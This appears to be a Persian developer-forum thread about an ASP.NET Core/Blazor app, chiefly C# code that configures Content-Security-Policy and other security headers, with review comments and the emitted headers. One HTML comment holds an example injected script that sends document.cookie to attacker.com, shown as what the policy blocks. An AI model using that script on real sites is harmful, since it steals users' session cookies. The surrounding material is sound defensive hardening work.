سلام
من اولین بار که اجرا می‌کنم تصویر را نشون نمی‌ده و به این صورت نمایش می‌ده:
بعد از لود صفحه، یک بار که صفحه را Refresh کنم همه چیز درست می‌شه؟
در قسمت Console هم خطایی وجود ندارد ....
ممنون
Content-Security-Policy: default-src 'self'
<!-- Example of an *injected* inline script that exfiltrates document.cookie to a third-party host.
     Under a policy that grants inline scripts no 'unsafe-inline', hash or nonce, the browser refuses
     to execute it and logs a violation (see the console message that follows) — this is exactly what
     the CSP is meant to stop. -->
<script>location.href="http://attacker.com/Cookies/?c="+encodeURIComponent(document.cookie);</script>
Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' 'unsafe-eval'". Either the 'unsafe-inline' keyword, a hash ('sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='), or a nonce ('nonce-...') is required to enable inline execution.
Content-Security-Policy: default-src 'self'; script-src 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='
<ItemGroup>
  <!-- Supplies HeaderPolicyCollection / UseSecurityHeaders used by SecurityHeadersBuilder.
       The version is pinned exactly so the emitted headers stay reproducible across builds;
       re-check the header defaults when bumping, and prefer a NuGet lock file so restore
       cannot silently substitute a different package build. -->
  <PackageReference Include="NetEscapades.AspNetCore.SecurityHeaders" Version="0.20.0" />
</ItemGroup>
/// <summary>
/// Builds the <see cref="HeaderPolicyCollection"/> that <c>app.UseSecurityHeaders(...)</c> applies:
/// CSP, cross-origin isolation headers, Permissions-Policy and (outside development) HSTS.
/// </summary>
public static class SecurityHeadersBuilder
{
    /// <summary>
    /// Returns the complete security-header policy for the application.
    /// </summary>
    /// <param name="isDevelopment">
    /// When <c>true</c> the Strict-Transport-Security header is not added, so plain-HTTP
    /// development URLs keep working; every other header is emitted in all environments.
    /// </param>
    /// <returns>The policy collection to pass to <c>UseSecurityHeaders</c>.</returns>
    public static HeaderPolicyCollection GetCsp(bool isDevelopment)
    {
        var policy = new HeaderPolicyCollection()
            // X-Frame-Options: DENY — legacy clickjacking defence, kept alongside frame-ancestors 'none' below.
            .AddFrameOptionsDeny()
            // NOTE(review): X-XSS-Protection "1; mode=block" is a legacy header; current guidance (OWASP) is to
            // send "0" or omit it, because the browser XSS auditor could be abused as an oracle and most modern
            // browsers ignore it anyway. Consider AddXssProtectionDisabled() if this library version exposes it — confirm.
            .AddXssProtectionBlock()
            .AddContentTypeOptionsNoSniff()
            .AddReferrerPolicyStrictOriginWhenCrossOrigin()
            // COOP/CORP/COEP together cross-origin-isolate the document. With COEP require-corp, every
            // cross-origin subresource (images, fonts, scripts) must carry a CORP header or be loaded via CORS,
            // otherwise the browser refuses it; the CSP img-src https: allowance below does not bypass that check.
            .AddCrossOriginOpenerPolicy(builder => builder.SameOrigin())
            .AddCrossOriginResourcePolicy(builder => builder.SameOrigin())
            .AddCrossOriginEmbedderPolicy(builder => builder.RequireCorp())
            .AddContentSecurityPolicy(builder =>
            {
                builder.AddBaseUri().Self();
                builder.AddDefaultSrc().Self().From("blob:");
                // NOTE(review): 'none' is the usual choice for object-src unless the app really embeds
                // plugin/object content; 'self' blob: also permits blob URLs generated in-page as plugin content.
                builder.AddObjectSrc().Self().From("blob:");
                // block-all-mixed-content is deprecated; upgrade-insecure-requests (added below) supersedes it.
                builder.AddBlockAllMixedContent();
                // https: permits images from any HTTPS origin — broad. Tighten to the specific hosts if they are known.
                builder.AddImgSrc().Self().From("data:").From("blob:").From("https:");
                builder.AddFontSrc().Self();
                // No 'unsafe-inline': inline <style> blocks and style="" attributes are refused by the browser.
                builder.AddStyleSrc().Self();
                builder.AddFrameAncestors().None();
                builder.AddConnectSrc().Self();
                builder.AddMediaSrc().Self();
                builder.AddScriptSrc().Self()
                    // Specify any additional hashes to permit your required `non-framework` scripts to load.
                    // NOTE(review): this is the hash the browser printed in the console message shown earlier on
                    // this page for a *blocked* inline script. Only whitelist a hash after confirming it belongs to
                    // a script you ship; copying whatever the console reports would also allow an injected script.
                    .WithHash256("Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=")
                    // Specify unsafe-eval to permit the `Blazor WebAssembly Mono runtime` to function.
                    .UnsafeEval();
                //TODO: Add api/CspReport/Log action method ...
                // https://www.dntips.ir/post/2706
                // The report endpoint receives automatic browser POSTs (Content-Type application/csp-report), so it
                // cannot require interactive authentication or anti-forgery tokens and is reachable by anyone:
                // treat the body as untrusted input, bound its size and rate-limit it.
                // report-uri is deprecated in favour of report-to/Reporting-Endpoints but is still honoured.
                builder.AddReportUri().To("/api/CspReport/Log");
                builder.AddUpgradeInsecureRequests();
            })
            // Suppress the Server header (reduces server fingerprinting).
            .RemoveServerHeader()
            .AddPermissionsPolicy(builder =>
            {
                // Every listed feature is disabled for all origins, except fullscreen which is allowed for any origin (*).
                builder.AddAccelerometer().None();
                builder.AddAutoplay().None();
                builder.AddCamera().None();
                builder.AddEncryptedMedia().None();
                builder.AddFullscreen().All();
                builder.AddGeolocation().None();
                builder.AddGyroscope().None();
                builder.AddMagnetometer().None();
                builder.AddMicrophone().None();
                builder.AddMidi().None();
                builder.AddPayment().None();
                builder.AddPictureInPicture().None();
                builder.AddSyncXHR().None();
                builder.AddUsb().None();
            });
        if (!isDevelopment)
        {
            // maxAge = one year in seconds
            // includeSubDomains makes browsers insist on HTTPS for every subdomain for that year once they have
            // seen the header — enable only when all subdomains are HTTPS-ready. preload is not set here.
            policy.AddStrictTransportSecurityMaxAgeIncludeSubDomains();
        }
        // Send the document-level headers (CSP, COOP/COEP, ...) on every response, not only on HTML documents
        // (presumably the library's default is HTML-only — confirm for the pinned version).
        policy.ApplyDocumentHeadersToAllResponses();
        return policy;
    }
}
var app = builder.Build();
// ...
// Register the security-header middleware before the rest of the pipeline so the headers are attached
// to responses produced by everything that runs after it. In development the policy omits HSTS (see GetCsp).
var headerPolicyCollection = SecurityHeadersBuilder.GetCsp(app.Environment.IsDevelopment());
app.UseSecurityHeaders(headerPolicyCollection);
app.UseHttpsRedirection();
// ...
Content-Security-Policy:base-uri 'self'; default-src 'self' blob:; object-src 'self' blob:; block-all-mixed-content; img-src 'self' data: blob: https:; font-src 'self'; style-src 'self'; frame-ancestors 'none'; connect-src 'self'; media-src 'self'; script-src 'self' 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=' 'unsafe-eval'; report-uri /api/CspReport/Log; upgrade-insecure-requests Cross-Origin-Embedder-Policy:require-corp Cross-Origin-Opener-Policy:same-origin Cross-Origin-Resource-Policy:same-origin Permissions-Policy:accelerometer=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=*, geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), sync-xhr=(), usb=() Referrer-Policy:strict-origin-when-cross-origin X-Content-Type-Options:nosniff X-Frame-Options:DENY X-Xss-Protection:1; mode=block
احتمالا به خاطر استفاده از AddDbContextPool هست چون با AddDbContextPool حتی یکبار هم خطایی رخ نداده و 6 ماه هم میشه که پروژه پابلیش شده و بدون مشکل کار میکنه.